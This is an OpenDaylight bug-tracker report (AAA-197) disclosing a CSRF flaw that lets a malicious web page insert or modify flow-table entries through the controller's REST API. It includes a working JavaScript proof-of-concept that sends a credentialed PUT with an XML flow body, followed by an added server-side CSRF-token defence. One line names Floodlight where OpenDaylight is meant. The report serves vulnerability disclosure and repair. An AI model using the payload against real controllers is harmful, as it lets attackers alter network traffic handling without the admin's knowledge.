  1. aaa
  2. AAA-197

[CSRF] Attacker can insert or modify the entry of flow table


    • Bug
    • Resolution: Duplicate
    • High
    • 0.16.0
    • Sodium SR1
    • General
    • None
    • Browsers Verified In:

      • [Firefox 71.0]

       

      Brief of this vulnerability

      An attacker can insert or modify an entry in the flow table. This attack was verified on Sodium-SR1. Although not tested in other versions, it is expected to be applicable.

      Description

      Hi, I found a CSRF bug in flow table insertion and modification. It can be dangerous for the admin. The victim admin can insert the attacker's intended flow into the flow table.

      The CSRF PoC is below:

      <meta charset="utf-8">
      <script  src="http://code.jquery.com/jquery-latest.min.js"></script>
       
      <script language ="javascript" type = "text/javascript" >
      var createCORSRequest = function(method, url) {
        var xhr = new XMLHttpRequest();
        if ("withCredentials" in xhr) {
          // Most browsers.
          xhr.open(method, url, true);
        } else if (typeof XDomainRequest != "undefined") {
          // IE8 & IE9
          xhr = new XDomainRequest();
          xhr.open(method, url);
        } else {
          // CORS not supported.
          xhr = null;
        }
        return xhr;
      };
       
      var url = 'http://127.0.0.1:8181/restconf/config/opendaylight-inventory:nodes/node/openflow:1/table/0/flow/1';
      var method = 'PUT';
      var xhr = createCORSRequest(method, url);
       
      xhr.onload = function() {
        // Success code goes here.
      };
       
      xhr.onerror = function() {
        // Error code goes here.
      };
       
      xhr.setRequestHeader('Content-Type', 'application/xml')
      xhr.withCredentials = true;
      xhr.send('<?xml version="1.0" encoding="UTF-8" standalone="no"?><flow xmlns="urn:opendaylight:flow:inventory"><priority>4</priority><flow-name>asdfa</flow-name><match><ethernet-match><ethernet-type><type>2048</type></ethernet-type></ethernet-match><ipv4-destination>10.0.0.1/24</ipv4-destination></match><id>1</id><table_id>0</table_id><instructions><instruction><order>0</order><apply-actions><action><order>0</order><dec-nw-ttl/></action></apply-actions></instruction></instructions></flow>');
       
      </script>

      This attack is an example because ODL itself is vulnerable to CSRF attacks.

      In fact, for any function that configures the ODL controller using the REST API, we can make arbitrary malicious settings using a CSRF attack.

      If an administrator accesses an arbitrary web page created by an attacker, Floodlight can be configured with arbitrary settings.

      To Reproduce:

      1. Administrator's benign access
      2. Administrator logged in to the dlux gui via the browser with admin account
      3. Administrator accesses ODL controller using REST API in browser with admin account
      4. Administrator visits the malicious webpage

      Solution:

      • Check CSRF tokens in all requests.
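
One way to implement the "check CSRF tokens in all requests" fix proposed above, as an added example that is not part of the original report or of OpenDaylight's own code. It is a server-side synchronizer-token check combined with an Origin allowlist; the `x-csrf-token` header name, the function names, the `attacker.example` origin and the sample requests are assumptions constructed for illustration.

```javascript
// Added example: CSRF check for state-changing REST calls (not ODL code).
const nodeCrypto = require('node:crypto');

const SAFE_METHODS = new Set(['GET', 'HEAD', 'OPTIONS']);
const TOKEN_HEADER = 'x-csrf-token'; // hypothetical header name

// Issue a per-session token at login; the server keeps it in the session
// and the legitimate UI echoes it back in TOKEN_HEADER on every write.
function issueCsrfToken(session) {
  session.csrfToken = nodeCrypto.randomBytes(32).toString('hex');
  return session.csrfToken;
}

// Constant-time comparison that tolerates missing or wrong-length input.
function tokensMatch(expected, presented) {
  if (typeof expected !== 'string' || typeof presented !== 'string') return false;
  const a = Buffer.from(expected);
  const b = Buffer.from(presented);
  return a.length === b.length && nodeCrypto.timingSafeEqual(a, b);
}

// req: { method, headers } with lower-cased header names, as Node's http module provides.
function checkRequest(req, session, trustedOrigins) {
  if (SAFE_METHODS.has(req.method.toUpperCase())) return { allowed: true, reason: 'safe-method' };
  const origin = req.headers['origin'];
  if (origin !== undefined && !trustedOrigins.includes(origin)) {
    return { allowed: false, reason: 'untrusted-origin' };
  }
  // A session cookie alone is never enough: the browser attaches it automatically.
  if (!tokensMatch(session.csrfToken, req.headers[TOKEN_HEADER])) {
    return { allowed: false, reason: 'bad-csrf-token' };
  }
  return { allowed: true, reason: 'token-ok' };
}

// Constructed sample requests (cookie value is a placeholder).
const TRUSTED = ['http://127.0.0.1:8181'];
const session = {};
const token = issueCsrfToken(session);
const cookie = 'JSESSIONID=constructed';
const crossSitePut = { method: 'PUT', headers: { origin: 'http://attacker.example', cookie } };
const tokenlessPut = { method: 'PUT', headers: { cookie } };
const legitPut = { method: 'PUT', headers: { origin: TRUSTED[0], cookie, [TOKEN_HEADER]: token } };

for (const [name, req] of Object.entries({ crossSitePut, tokenlessPut, legitPut })) {
  console.log(name, checkRequest(req, session, TRUSTED));
}
```
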

            rovarga Robert Varga
            seongil-wi Seongil Wi